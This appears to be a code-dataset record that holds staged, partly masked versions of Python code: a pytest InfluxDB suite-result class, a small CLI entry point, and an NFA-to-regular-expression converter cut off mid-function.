"step-4": "<mask token>\n\n\nclass SuiteResultDTO:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def set_run(self, run):\n if run != '':\n self.__run = str(run)\n\n def set_project(self, project):\n if project != '':\n self.__project = str(project)\n\n def set_version(self, version):\n if version != '':\n self.__version = str(version)\n <mask token>\n\n def set_failed(self, failed):\n self.__failed = int(failed)\n\n def set_skipped(self, skipped):\n self.__skipped = int(skipped)\n\n def set_error(self, error):\n self.__error = int(error)\n\n def set_duration_sec(self, duration_sec):\n self.__duration_sec = int(duration_sec)\n\n def set_disabled(self, disabled):\n self.__disabled = int(disabled)\n <mask token>\n\n def set_suite_result_dict(self, suite_result_dict):\n SuiteResultDTO.__suite_result_dict = suite_result_dict\n\n def get_suite_json(self, measurement_name):\n json_body = [{'measurement': measurement_name, 'tags': {'run': self\n .__run, 'project': self.__project, 'version': self.__version},\n 'fields': {'pass': self.__passed, 'fail': self.__failed, 'skip':\n self.__skipped, 'error': self.__error, 'disabled': self.\n __disabled, 'duration_sec': self.__duration_sec, 'retries':\n self.__retries}}]\n tags_dict = SuiteResultDTO.__suite_result_dict['tags']\n for key in tags_dict:\n suite_tags = json_body[0]['tags']\n suite_tags.update({key: tags_dict[key]})\n fields_dict = SuiteResultDTO.__suite_result_dict['fields']\n for key in fields_dict:\n suite_fields = json_body[0]['fields']\n suite_fields.update({key: fields_dict[key]})\n return json_body\n\n def set_tag_values(self, tags_dict):\n suite_tags = SuiteResultDTO.__suite_result_dict\n suite_tags['tags'].update(tags_dict)\n\n def set_field_values(self, fields_dict):\n suite_fields = SuiteResultDTO.__suite_result_dict\n suite_fields['fields'].update(fields_dict)\n\n def set_suite_custom_values(self, influxdb_values):\n if influxdb_values and influxdb_values != '':\n if isinstance(influxdb_values, str):\n influxdb_values = json.loads(influxdb_values)\n self.set_field_values(influxdb_values['fields']['suite_result'])\n self.set_tag_values(influxdb_values['tags']['suite_result'])\n\n def get_suite_result_dto(self, terminalreporter, global_values,\n influxdb_components, db_measurement_name_for_suite):\n execution_time = round(time.time() - terminalreporter._sessionstarttime\n )\n suite_results_dict = DataManager().get_results_dict(terminalreporter\n .stats)\n self.set_passed(suite_results_dict.get('passed'))\n self.set_failed(suite_results_dict.get('failed'))\n self.set_skipped(suite_results_dict.get('skipped'))\n self.set_error(suite_results_dict.get('error'))\n self.set_disabled(suite_results_dict.get('disabled'))\n self.set_duration_sec(execution_time)\n self.set_retries(suite_results_dict.get('reruns'))\n self.set_run(global_values.get('run'))\n self.set_project(global_values.get('project'))\n self.set_version(global_values.get('version'))\n self.set_suite_custom_values(global_values.get('influxdb_values'))\n self.merge_suite_result(global_values.get('merged'),\n influxdb_components, db_measurement_name_for_suite,\n global_values.get('run'))\n return self\n\n def merge_suite_result(self, merged_enabled, influxdb_components,\n db_measurement_name_for_suite, run_id_value):\n existing_suite_result = influxdb_components.get_results_by_run(\n db_measurement_name_for_suite, run_id_value)\n old_suite_list = list(existing_suite_result.get_points(measurement=\n f'{db_measurement_name_for_suite}'))\n if len(old_suite_list) != 0 and merged_enabled:\n old_suite_total_count = old_suite_list[0]['pass'] + old_suite_list[\n 0]['fail'] + old_suite_list[0]['skip']\n old_disabled_tests_count = old_suite_list[0]['disabled']\n self.set_passed(old_suite_total_count - self.__failed - self.\n __skipped)\n self.set_disabled(old_disabled_tests_count)\n influxdb_components.delete_results_by_run(\n db_measurement_name_for_suite, run_id_value)\n",
"step-5": "import json\nimport time\n\nfrom pytest_influxdb.data_manager import DataManager\n\n\nclass SuiteResultDTO:\n __run = 'UNDEFINED'\n __project = 'UNDEFINED'\n __version = 'UNDEFINED'\n __passed = None\n __failed = None\n __skipped = None\n __error = None\n __duration_sec = 0\n __disabled = 0\n __retries = 0\n __suite_result_dict = {'tags': {}, 'fields': {}}\n\n def set_run(self, run):\n if run != '':\n self.__run = str(run)\n\n def set_project(self, project):\n if project != '':\n self.__project = str(project)\n\n def set_version(self, version):\n if version != '':\n self.__version = str(version)\n\n def set_passed(self, passed):\n self.__passed = int(passed)\n\n def set_failed(self, failed):\n self.__failed = int(failed)\n\n def set_skipped(self, skipped):\n self.__skipped = int(skipped)\n\n def set_error(self, error):\n self.__error = int(error)\n\n def set_duration_sec(self, duration_sec):\n self.__duration_sec = int(duration_sec)\n\n def set_disabled(self, disabled):\n self.__disabled = int(disabled)\n\n def set_retries(self, retries):\n self.__retries = int(retries)\n\n def set_suite_result_dict(self, suite_result_dict):\n SuiteResultDTO.__suite_result_dict = suite_result_dict\n\n def get_suite_json(self, measurement_name):\n json_body = [\n {\n \"measurement\": measurement_name,\n \"tags\": {\n \"run\": self.__run,\n \"project\": self.__project,\n \"version\": self.__version\n },\n \"fields\": {\n \"pass\": self.__passed,\n \"fail\": self.__failed,\n \"skip\": self.__skipped,\n \"error\": self.__error,\n \"disabled\": self.__disabled,\n \"duration_sec\": self.__duration_sec,\n \"retries\": self.__retries\n }\n }\n ]\n\n # Appending custom values to json_body\n tags_dict = SuiteResultDTO.__suite_result_dict['tags']\n for key in tags_dict:\n suite_tags = json_body[0]['tags']\n suite_tags.update({key: tags_dict[key]})\n fields_dict = SuiteResultDTO.__suite_result_dict['fields']\n for key in fields_dict:\n suite_fields = json_body[0]['fields']\n suite_fields.update({key: fields_dict[key]})\n\n return json_body\n\n def set_tag_values(self, tags_dict):\n suite_tags = SuiteResultDTO.__suite_result_dict\n suite_tags['tags'].update(tags_dict)\n\n def set_field_values(self, fields_dict):\n suite_fields = SuiteResultDTO.__suite_result_dict\n suite_fields['fields'].update(fields_dict)\n\n def set_suite_custom_values(self, influxdb_values):\n if influxdb_values and influxdb_values != '':\n if isinstance(influxdb_values, str):\n influxdb_values = json.loads(influxdb_values)\n self.set_field_values(influxdb_values['fields']['suite_result'])\n self.set_tag_values(influxdb_values['tags']['suite_result'])\n\n def get_suite_result_dto(self, terminalreporter, global_values, influxdb_components, db_measurement_name_for_suite):\n # Preparing execution time and suite results from the terminalreporter (where all the data collected)\n execution_time = round(time.time() - terminalreporter._sessionstarttime)\n suite_results_dict = DataManager().get_results_dict(terminalreporter.stats)\n # Setting the values to the suite_result_dto instance\n self.set_passed(suite_results_dict.get('passed'))\n self.set_failed(suite_results_dict.get('failed'))\n self.set_skipped(suite_results_dict.get('skipped'))\n self.set_error(suite_results_dict.get('error'))\n self.set_disabled(suite_results_dict.get('disabled'))\n self.set_duration_sec(execution_time)\n self.set_retries(suite_results_dict.get('reruns'))\n self.set_run(global_values.get(\"run\"))\n self.set_project(global_values.get(\"project\"))\n self.set_version(global_values.get(\"version\"))\n self.set_suite_custom_values(global_values.get(\"influxdb_values\"))\n\n self.merge_suite_result(global_values.get('merged'), influxdb_components,\n db_measurement_name_for_suite, global_values.get(\"run\"))\n\n return self\n\n def merge_suite_result(self, merged_enabled, influxdb_components, db_measurement_name_for_suite, run_id_value):\n # Merging the existing suite results with the suite_results from db for the same run\n # if 'merged' config value is True\n existing_suite_result = influxdb_components.get_results_by_run(db_measurement_name_for_suite, run_id_value)\n old_suite_list = list(existing_suite_result.get_points(measurement=f'{db_measurement_name_for_suite}'))\n if len(old_suite_list) != 0 and merged_enabled:\n old_suite_total_count = old_suite_list[0]['pass'] + old_suite_list[0]['fail'] + old_suite_list[0][\n 'skip']\n old_disabled_tests_count = old_suite_list[0]['disabled']\n self.set_passed(\n old_suite_total_count - self.__failed - self.__skipped)\n self.set_disabled(old_disabled_tests_count)\n influxdb_components.delete_results_by_run(db_measurement_name_for_suite, run_id_value)\n",
"step-ids": [
13,
14,
15,
16,
21
]
}
|
[
13,
14,
15,
16,
21
] |
import sys
from . import cli
def main() ->None:
try:
command = sys.argv[0]
args = sys.argv[1:]
cli.main(command, args)
except KeyboardInterrupt:
pass
|
normal
|
{
"blob_id": "9969dcf820a5ff34b483593cd43e4dfba9588ed2",
"index": 4348,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef main() ->None:\n try:\n command = sys.argv[0]\n args = sys.argv[1:]\n cli.main(command, args)\n except KeyboardInterrupt:\n pass\n",
"step-3": "import sys\nfrom . import cli\n\n\ndef main() ->None:\n try:\n command = sys.argv[0]\n args = sys.argv[1:]\n cli.main(command, args)\n except KeyboardInterrupt:\n pass\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
def replaceNode(nfa, old, new):
if DEBUG:
print('R_Start(%s, %s) ---' % (old, new), nfa)
if old in nfa._deltas:
for input in nfa._deltas[old]:
nfa.addDelta(new, input, nfa._deltas[old][input])
del nfa._deltas[old]
if DEBUG:
print('R_SwitchedSource(%s, %s) ---' % (old, new), nfa)
deltas_temp = copyDeltas(nfa._deltas)
for src in deltas_temp:
for input in deltas_temp[src]:
if old in deltas_temp[src][input]:
nfa._deltas[src][input].remove(old)
nfa._deltas[src][input].add(new)
if DEBUG:
print('R_SwitchedDest(%s, %s) ---' % (old, new), nfa)
<|reserved_special_token_0|>
class NetworkNFA(NFA):
def __init__(self, nfa):
if type(nfa) is not NFA:
raise AutomataError('Can create a NetworkNFA only from an NFA.')
if all([(len(i) == 1) for i in nfa.charset]):
self._charset = copy(nfa._charset)
else:
self._charset = set([('{%s}' % i) for i in nfa._charset])
self._nodes = copy(nfa._nodes)
self._deltas = copyDeltas(nfa._deltas)
self._start = nfa._start
self._terminals = copy(nfa._terminals)
def addDelta(self, node, input, dest):
if set(input) - self._charset.union(set('()+*')):
raise AutomataError('%s contains symbols not in charset.' % input)
if type(node) is Node:
if type(dest) is set and all([(type(i) is Node) for i in dest]):
if len(dest):
if node in self._deltas:
if input in self._deltas[node]:
self._deltas[node][input] = self._deltas[node][
input].union(dest)
else:
self._deltas[node][input] = dest
else:
self._deltas[node] = {input: dest}
elif type(dest) is Node:
if node in self._deltas:
if input in self._deltas[node]:
self._deltas[node][input].add(dest)
else:
self._deltas[node][input] = set([dest])
else:
self._deltas[node] = {input: set([dest])}
else:
raise AutomataError(
'Delta destination must be a Node or a set of nodes, not %s.'
% type(dest).__name__)
else:
raise AutomataError('Delta source must be Node, not %s.' % type
(node).__name__)
def remDelta(self, node, input):
if set(input) - self._charset.union(set('()+*')):
raise AutomataError('%s contains symbols not in charset.' % input)
if type(node) is Node:
if node in self._deltas and input in self._deltas[node]:
self._deltas[node].pop(input)
if len(self._deltas[node]) == 0:
del self._deltas[node]
else:
raise AutomataError('Delta source must be a Node, not %s' %
type(node).__name__)
def isValid(self):
if len(self._nodes) == 0:
return False
if self._start not in self._nodes:
return False
for i in self._terminals:
if i not in self._nodes:
return False
if not set(self._deltas.keys()).issubset(self._nodes):
return False
for key in self._deltas:
for char in self._deltas[key]:
if set(char) - self._charset.union(set('()+*')):
return False
return True
def apply(self, input, start):
raise AutomataError('NetworkNFA does not allow direct application.')
def __repr__(self):
ret = '<NetworkNFA>\n'
ret += ' Charset: {%s}\n' % ','.join(filter(None, self._charset))
ret += ' Nodes: {%s}\n' % ','.join([i.label for i in self._nodes])
ret += 'Terminals: {%s}\n' % ','.join([i.label for i in self.
_terminals])
ret += ' Start: %s\n' % (self._start and self._start.label)
ret += ' Delta: '
if len(self._deltas):
for qFrom in self._deltas:
for input in self._deltas[qFrom]:
ret += 'D(%s, %s) -> {%s}\n ' % (qFrom.label,
input or 'lambda', ','.join([i.label for i in self.
_deltas[qFrom][input]]))
ret = ret.rstrip() + '\n'
else:
ret += 'None\n'
ret += ' Valid: %s\n' % ('Yes' if self.isValid() else 'No')
ret += '</NetworkNFA>'
return ret
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def copyDeltas(src):
out = dict()
for k in src:
out[k] = dict()
for k2 in src[k]:
out[k][k2] = copy(src[k][k2])
return out
def replaceNode(nfa, old, new):
if DEBUG:
print('R_Start(%s, %s) ---' % (old, new), nfa)
if old in nfa._deltas:
for input in nfa._deltas[old]:
nfa.addDelta(new, input, nfa._deltas[old][input])
del nfa._deltas[old]
if DEBUG:
print('R_SwitchedSource(%s, %s) ---' % (old, new), nfa)
deltas_temp = copyDeltas(nfa._deltas)
for src in deltas_temp:
for input in deltas_temp[src]:
if old in deltas_temp[src][input]:
nfa._deltas[src][input].remove(old)
nfa._deltas[src][input].add(new)
if DEBUG:
print('R_SwitchedDest(%s, %s) ---' % (old, new), nfa)
<|reserved_special_token_0|>
class NetworkNFA(NFA):
def __init__(self, nfa):
if type(nfa) is not NFA:
raise AutomataError('Can create a NetworkNFA only from an NFA.')
if all([(len(i) == 1) for i in nfa.charset]):
self._charset = copy(nfa._charset)
else:
self._charset = set([('{%s}' % i) for i in nfa._charset])
self._nodes = copy(nfa._nodes)
self._deltas = copyDeltas(nfa._deltas)
self._start = nfa._start
self._terminals = copy(nfa._terminals)
def addDelta(self, node, input, dest):
if set(input) - self._charset.union(set('()+*')):
raise AutomataError('%s contains symbols not in charset.' % input)
if type(node) is Node:
if type(dest) is set and all([(type(i) is Node) for i in dest]):
if len(dest):
if node in self._deltas:
if input in self._deltas[node]:
self._deltas[node][input] = self._deltas[node][
input].union(dest)
else:
self._deltas[node][input] = dest
else:
self._deltas[node] = {input: dest}
elif type(dest) is Node:
if node in self._deltas:
if input in self._deltas[node]:
self._deltas[node][input].add(dest)
else:
self._deltas[node][input] = set([dest])
else:
self._deltas[node] = {input: set([dest])}
else:
raise AutomataError(
'Delta destination must be a Node or a set of nodes, not %s.'
% type(dest).__name__)
else:
raise AutomataError('Delta source must be Node, not %s.' % type
(node).__name__)
def remDelta(self, node, input):
if set(input) - self._charset.union(set('()+*')):
raise AutomataError('%s contains symbols not in charset.' % input)
if type(node) is Node:
if node in self._deltas and input in self._deltas[node]:
self._deltas[node].pop(input)
if len(self._deltas[node]) == 0:
del self._deltas[node]
else:
raise AutomataError('Delta source must be a Node, not %s' %
type(node).__name__)
def isValid(self):
if len(self._nodes) == 0:
return False
if self._start not in self._nodes:
return False
for i in self._terminals:
if i not in self._nodes:
return False
if not set(self._deltas.keys()).issubset(self._nodes):
return False
for key in self._deltas:
for char in self._deltas[key]:
if set(char) - self._charset.union(set('()+*')):
return False
return True
def apply(self, input, start):
raise AutomataError('NetworkNFA does not allow direct application.')
def __repr__(self):
ret = '<NetworkNFA>\n'
ret += ' Charset: {%s}\n' % ','.join(filter(None, self._charset))
ret += ' Nodes: {%s}\n' % ','.join([i.label for i in self._nodes])
ret += 'Terminals: {%s}\n' % ','.join([i.label for i in self.
_terminals])
ret += ' Start: %s\n' % (self._start and self._start.label)
ret += ' Delta: '
if len(self._deltas):
for qFrom in self._deltas:
for input in self._deltas[qFrom]:
ret += 'D(%s, %s) -> {%s}\n ' % (qFrom.label,
input or 'lambda', ','.join([i.label for i in self.
_deltas[qFrom][input]]))
ret = ret.rstrip() + '\n'
else:
ret += 'None\n'
ret += ' Valid: %s\n' % ('Yes' if self.isValid() else 'No')
ret += '</NetworkNFA>'
return ret
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def copyDeltas(src):
out = dict()
for k in src:
out[k] = dict()
for k2 in src[k]:
out[k][k2] = copy(src[k][k2])
return out
def replaceNode(nfa, old, new):
if DEBUG:
print('R_Start(%s, %s) ---' % (old, new), nfa)
if old in nfa._deltas:
for input in nfa._deltas[old]:
nfa.addDelta(new, input, nfa._deltas[old][input])
del nfa._deltas[old]
if DEBUG:
print('R_SwitchedSource(%s, %s) ---' % (old, new), nfa)
deltas_temp = copyDeltas(nfa._deltas)
for src in deltas_temp:
for input in deltas_temp[src]:
if old in deltas_temp[src][input]:
nfa._deltas[src][input].remove(old)
nfa._deltas[src][input].add(new)
if DEBUG:
print('R_SwitchedDest(%s, %s) ---' % (old, new), nfa)
def commonsuffix(seq):
def reverse(s):
out = ''
for c in reversed(s):
out += c
return out
seq = [reverse(i) for i in seq]
return reverse(commonprefix(seq))
class NetworkNFA(NFA):
def __init__(self, nfa):
if type(nfa) is not NFA:
raise AutomataError('Can create a NetworkNFA only from an NFA.')
if all([(len(i) == 1) for i in nfa.charset]):
self._charset = copy(nfa._charset)
else:
self._charset = set([('{%s}' % i) for i in nfa._charset])
self._nodes = copy(nfa._nodes)
self._deltas = copyDeltas(nfa._deltas)
self._start = nfa._start
self._terminals = copy(nfa._terminals)
def addDelta(self, node, input, dest):
if set(input) - self._charset.union(set('()+*')):
raise AutomataError('%s contains symbols not in charset.' % input)
if type(node) is Node:
if type(dest) is set and all([(type(i) is Node) for i in dest]):
if len(dest):
if node in self._deltas:
if input in self._deltas[node]:
self._deltas[node][input] = self._deltas[node][
input].union(dest)
else:
self._deltas[node][input] = dest
else:
self._deltas[node] = {input: dest}
elif type(dest) is Node:
if node in self._deltas:
if input in self._deltas[node]:
self._deltas[node][input].add(dest)
else:
self._deltas[node][input] = set([dest])
else:
self._deltas[node] = {input: set([dest])}
else:
raise AutomataError(
'Delta destination must be a Node or a set of nodes, not %s.'
% type(dest).__name__)
else:
raise AutomataError('Delta source must be Node, not %s.' % type
(node).__name__)
def remDelta(self, node, input):
if set(input) - self._charset.union(set('()+*')):
raise AutomataError('%s contains symbols not in charset.' % input)
if type(node) is Node:
if node in self._deltas and input in self._deltas[node]:
self._deltas[node].pop(input)
if len(self._deltas[node]) == 0:
del self._deltas[node]
else:
raise AutomataError('Delta source must be a Node, not %s' %
type(node).__name__)
def isValid(self):
if len(self._nodes) == 0:
return False
if self._start not in self._nodes:
return False
for i in self._terminals:
if i not in self._nodes:
return False
if not set(self._deltas.keys()).issubset(self._nodes):
return False
for key in self._deltas:
for char in self._deltas[key]:
if set(char) - self._charset.union(set('()+*')):
return False
return True
def apply(self, input, start):
raise AutomataError('NetworkNFA does not allow direct application.')
def __repr__(self):
ret = '<NetworkNFA>\n'
ret += ' Charset: {%s}\n' % ','.join(filter(None, self._charset))
ret += ' Nodes: {%s}\n' % ','.join([i.label for i in self._nodes])
ret += 'Terminals: {%s}\n' % ','.join([i.label for i in self.
_terminals])
ret += ' Start: %s\n' % (self._start and self._start.label)
ret += ' Delta: '
if len(self._deltas):
for qFrom in self._deltas:
for input in self._deltas[qFrom]:
ret += 'D(%s, %s) -> {%s}\n ' % (qFrom.label,
input or 'lambda', ','.join([i.label for i in self.
_deltas[qFrom][input]]))
ret = ret.rstrip() + '\n'
else:
ret += 'None\n'
ret += ' Valid: %s\n' % ('Yes' if self.isValid() else 'No')
ret += '</NetworkNFA>'
return ret
def nfa2regex(nfa):
if not nfa.isValid():
raise AutomataError(
'NFA must be in a valid state to be converted to a regex.')
network = NetworkNFA(nfa)
if DEBUG:
print('START', network)
start = Node('qs')
network.addNode(start)
network.addDelta(start, '', network.start)
network.start = start
end = Node('qf')
network.addNode(end)
for i in network.terminals:
network.addDelta(i, '', end)
network.remTerminal(i)
network.addTerminal(end)
if DEBUG:
print('Dummies added: ', network)
for src in network.nodes:
delta_temp = network.getDelta(src)
for dest in network.nodes:
chars = []
for input in delta_temp:
if input and dest in delta_temp[input]:
chars.append(input)
if len(chars):
for c in chars:
delta_temp[c].remove(dest)
if len(delta_temp[c]) == 0:
del delta_temp[c]
if len(chars) > 1:
chars = '(' + '+'.join(chars) + ')'
else:
chars = '+'.join(chars)
network.addDelta(src, chars, dest)
if DEBUG:
print('Collapsed: ', network)
pliableNodes = list(network.nodes)
pliableNodes.remove(network.start)
for n in network.terminals:
pliableNodes.remove(n)
nodeFinalDist = {}
maxDist = len(network.nodes) ** len(network.nodes)
for n in network.nodes:
nodeFinalDist[n] = maxDist
nodeFinalDist[network.terminals[0]] = 0
toProcess = list(network.nodes)
toProcess.remove(network.terminals[0])
while len(toProcess):
for node in toProcess:
dests = network.getDelta(node).values()
if len(dests) == 0:
dests = set([])
else:
dests = reduce(set.union, network.getDelta(node).values())
if len(dests) == 0:
toProcess.remove(node)
else:
minDist = min([nodeFinalDist[i] for i in dests])
if minDist != maxDist:
nodeFinalDist[node] = minDist + 1
toProcess.remove(node)
pliableNodes.sort(key=lambda x: nodeFinalDist[x], reverse=True)
if DEBUG:
print('Pliables: ', pliableNodes)
for node in pliableNodes:
network.remNode(node)
delta = copy(network.getDelta(node))
loops = []
for input in delta:
if node in delta[input]:
if len(input):
loops.append(input)
loopRegex = '+'.join(loops)
if len(loopRegex) > 1 and not (loopRegex[0] == '(' and loopRegex[-1
] == ')'):
loopRegex = '(' + loopRegex + ')*'
elif len(loopRegex) >= 1:
loopRegex = loopRegex + '*'
for input in copy(delta):
if delta[input] == set([node]):
del delta[input]
elif node in delta[input]:
delta[input].remove(node)
if '' in delta and (len(delta) != 1 or len(delta['']) != 1):
eligible = []
for dest in delta['']:
delta_temp = network.getDelta(dest)
if '' in delta_temp and node in delta_temp['']:
eligible.append(dest)
if len(eligible):
replaceNode(network, node, eligible[0])
continue
try:
del network._deltas[node]
except KeyError:
continue
if DEBUG:
print('Working on connections: ', node, delta)
deltas_temp = copyDeltas(network._deltas)
for src in deltas_temp:
for input in deltas_temp[src]:
tempDeltaDest = network.getDelta(src)[input]
if node in tempDeltaDest:
tempDeltaDest.remove(node)
if len(tempDeltaDest) == 0:
network.remDelta(src, input)
for input2 in delta:
for dest in delta[input2]:
if not (src == dest and input + loopRegex +
input2 == ''):
network.addDelta(src, input + loopRegex +
input2, dest)
if DEBUG:
print('New Delta:', src, input,
loopRegex, input2, dest, network)
branches = network.getDelta(network.start).keys()
if len(branches) == 1:
regex = branches[0]
else:
prefix = commonprefix(branches)
suffix = commonsuffix(branches)
branches = [(i[len(prefix):-len(suffix)] if len(suffix) else i[len(
prefix):]) for i in branches]
branches.sort(key=len)
if len(prefix) or len(suffix):
regex = prefix + '(' + '+'.join([(i or LAMBDA) for i in branches]
) + ')' + suffix
else:
regex = '+'.join([(i or LAMBDA) for i in branches]) or PHI
return regex
<|reserved_special_token_1|>
from util import AutomataError
from automata import NFA
from base import Node
from copy import copy, deepcopy
from os.path import commonprefix
DEBUG = False
LAMBDA = u'λ'
PHI = u'Ø'
def copyDeltas(src):
out = dict()
for k in src:
out[k] = dict()
for k2 in src[k]:
out[k][k2] = copy(src[k][k2])
return out
def replaceNode(nfa, old, new):
if DEBUG:
print('R_Start(%s, %s) ---' % (old, new), nfa)
if old in nfa._deltas:
for input in nfa._deltas[old]:
nfa.addDelta(new, input, nfa._deltas[old][input])
del nfa._deltas[old]
if DEBUG:
print('R_SwitchedSource(%s, %s) ---' % (old, new), nfa)
deltas_temp = copyDeltas(nfa._deltas)
for src in deltas_temp:
for input in deltas_temp[src]:
if old in deltas_temp[src][input]:
nfa._deltas[src][input].remove(old)
nfa._deltas[src][input].add(new)
if DEBUG:
print('R_SwitchedDest(%s, %s) ---' % (old, new), nfa)
def commonsuffix(seq):
def reverse(s):
out = ''
for c in reversed(s):
out += c
return out
seq = [reverse(i) for i in seq]
return reverse(commonprefix(seq))
class NetworkNFA(NFA):
def __init__(self, nfa):
if type(nfa) is not NFA:
raise AutomataError('Can create a NetworkNFA only from an NFA.')
if all([(len(i) == 1) for i in nfa.charset]):
self._charset = copy(nfa._charset)
else:
self._charset = set([('{%s}' % i) for i in nfa._charset])
self._nodes = copy(nfa._nodes)
self._deltas = copyDeltas(nfa._deltas)
self._start = nfa._start
self._terminals = copy(nfa._terminals)
def addDelta(self, node, input, dest):
if set(input) - self._charset.union(set('()+*')):
raise AutomataError('%s contains symbols not in charset.' % input)
if type(node) is Node:
if type(dest) is set and all([(type(i) is Node) for i in dest]):
if len(dest):
if node in self._deltas:
if input in self._deltas[node]:
self._deltas[node][input] = self._deltas[node][
input].union(dest)
else:
self._deltas[node][input] = dest
else:
self._deltas[node] = {input: dest}
elif type(dest) is Node:
if node in self._deltas:
if input in self._deltas[node]:
self._deltas[node][input].add(dest)
else:
self._deltas[node][input] = set([dest])
else:
self._deltas[node] = {input: set([dest])}
else:
raise AutomataError(
'Delta destination must be a Node or a set of nodes, not %s.'
% type(dest).__name__)
else:
raise AutomataError('Delta source must be Node, not %s.' % type
(node).__name__)
def remDelta(self, node, input):
if set(input) - self._charset.union(set('()+*')):
raise AutomataError('%s contains symbols not in charset.' % input)
if type(node) is Node:
if node in self._deltas and input in self._deltas[node]:
self._deltas[node].pop(input)
if len(self._deltas[node]) == 0:
del self._deltas[node]
else:
raise AutomataError('Delta source must be a Node, not %s' %
type(node).__name__)
def isValid(self):
if len(self._nodes) == 0:
return False
if self._start not in self._nodes:
return False
for i in self._terminals:
if i not in self._nodes:
return False
if not set(self._deltas.keys()).issubset(self._nodes):
return False
for key in self._deltas:
for char in self._deltas[key]:
if set(char) - self._charset.union(set('()+*')):
return False
return True
def apply(self, input, start):
raise AutomataError('NetworkNFA does not allow direct application.')
def __repr__(self):
ret = '<NetworkNFA>\n'
ret += ' Charset: {%s}\n' % ','.join(filter(None, self._charset))
ret += ' Nodes: {%s}\n' % ','.join([i.label for i in self._nodes])
ret += 'Terminals: {%s}\n' % ','.join([i.label for i in self.
_terminals])
ret += ' Start: %s\n' % (self._start and self._start.label)
ret += ' Delta: '
if len(self._deltas):
for qFrom in self._deltas:
for input in self._deltas[qFrom]:
ret += 'D(%s, %s) -> {%s}\n ' % (qFrom.label,
input or 'lambda', ','.join([i.label for i in self.
_deltas[qFrom][input]]))
ret = ret.rstrip() + '\n'
else:
ret += 'None\n'
ret += ' Valid: %s\n' % ('Yes' if self.isValid() else 'No')
ret += '</NetworkNFA>'
return ret
def nfa2regex(nfa):
if not nfa.isValid():
raise AutomataError(
'NFA must be in a valid state to be converted to a regex.')
network = NetworkNFA(nfa)
if DEBUG:
print('START', network)
start = Node('qs')
network.addNode(start)
network.addDelta(start, '', network.start)
network.start = start
end = Node('qf')
network.addNode(end)
for i in network.terminals:
network.addDelta(i, '', end)
network.remTerminal(i)
network.addTerminal(end)
if DEBUG:
print('Dummies added: ', network)
for src in network.nodes:
delta_temp = network.getDelta(src)
for dest in network.nodes:
chars = []
for input in delta_temp:
if input and dest in delta_temp[input]:
chars.append(input)
if len(chars):
for c in chars:
delta_temp[c].remove(dest)
if len(delta_temp[c]) == 0:
del delta_temp[c]
if len(chars) > 1:
chars = '(' + '+'.join(chars) + ')'
else:
chars = '+'.join(chars)
network.addDelta(src, chars, dest)
if DEBUG:
print('Collapsed: ', network)
pliableNodes = list(network.nodes)
pliableNodes.remove(network.start)
for n in network.terminals:
pliableNodes.remove(n)
nodeFinalDist = {}
maxDist = len(network.nodes) ** len(network.nodes)
for n in network.nodes:
nodeFinalDist[n] = maxDist
nodeFinalDist[network.terminals[0]] = 0
toProcess = list(network.nodes)
toProcess.remove(network.terminals[0])
while len(toProcess):
for node in toProcess:
dests = network.getDelta(node).values()
if len(dests) == 0:
dests = set([])
else:
dests = reduce(set.union, network.getDelta(node).values())
if len(dests) == 0:
toProcess.remove(node)
else:
minDist = min([nodeFinalDist[i] for i in dests])
if minDist != maxDist:
nodeFinalDist[node] = minDist + 1
toProcess.remove(node)
pliableNodes.sort(key=lambda x: nodeFinalDist[x], reverse=True)
if DEBUG:
print('Pliables: ', pliableNodes)
for node in pliableNodes:
network.remNode(node)
delta = copy(network.getDelta(node))
loops = []
for input in delta:
if node in delta[input]:
if len(input):
loops.append(input)
loopRegex = '+'.join(loops)
if len(loopRegex) > 1 and not (loopRegex[0] == '(' and loopRegex[-1
] == ')'):
loopRegex = '(' + loopRegex + ')*'
elif len(loopRegex) >= 1:
loopRegex = loopRegex + '*'
for input in copy(delta):
if delta[input] == set([node]):
del delta[input]
elif node in delta[input]:
delta[input].remove(node)
if '' in delta and (len(delta) != 1 or len(delta['']) != 1):
eligible = []
for dest in delta['']:
delta_temp = network.getDelta(dest)
if '' in delta_temp and node in delta_temp['']:
eligible.append(dest)
if len(eligible):
replaceNode(network, node, eligible[0])
continue
try:
del network._deltas[node]
except KeyError:
continue
if DEBUG:
print('Working on connections: ', node, delta)
deltas_temp = copyDeltas(network._deltas)
for src in deltas_temp:
for input in deltas_temp[src]:
tempDeltaDest = network.getDelta(src)[input]
if node in tempDeltaDest:
tempDeltaDest.remove(node)
if len(tempDeltaDest) == 0:
network.remDelta(src, input)
for input2 in delta:
for dest in delta[input2]:
if not (src == dest and input + loopRegex +
input2 == ''):
network.addDelta(src, input + loopRegex +
input2, dest)
if DEBUG:
print('New Delta:', src, input,
loopRegex, input2, dest, network)
branches = network.getDelta(network.start).keys()
if len(branches) == 1:
regex = branches[0]
else:
prefix = commonprefix(branches)
suffix = commonsuffix(branches)
branches = [(i[len(prefix):-len(suffix)] if len(suffix) else i[len(
prefix):]) for i in branches]
branches.sort(key=len)
if len(prefix) or len(suffix):
regex = prefix + '(' + '+'.join([(i or LAMBDA) for i in branches]
) + ')' + suffix
else:
regex = '+'.join([(i or LAMBDA) for i in branches]) or PHI
return regex
<|reserved_special_token_1|>
from util import AutomataError
from automata import NFA
from base import Node
from copy import copy, deepcopy
from os.path import commonprefix
DEBUG = False
LAMBDA = u'\u03bb'
PHI = u'\u00d8'
def copyDeltas(src):
out = dict()
for k in src:
out[k] = dict()
for k2 in src[k]:
out[k][k2] = copy(src[k][k2])
return out
def replaceNode(nfa, old, new):
if DEBUG:
print('R_Start(%s, %s) ---' % (old, new), nfa)
if old in nfa._deltas:
for input in nfa._deltas[old]:
nfa.addDelta(new, input, nfa._deltas[old][input])
del nfa._deltas[old]
if DEBUG:
print('R_SwitchedSource(%s, %s) ---' % (old, new), nfa)
deltas_temp = copyDeltas(nfa._deltas)
for src in deltas_temp:
for input in deltas_temp[src]:
if old in deltas_temp[src][input]:
nfa._deltas[src][input].remove(old)
nfa._deltas[src][input].add(new)
if DEBUG:
print('R_SwitchedDest(%s, %s) ---' % (old, new), nfa)
def commonsuffix(seq):
def reverse(s):
out = ''
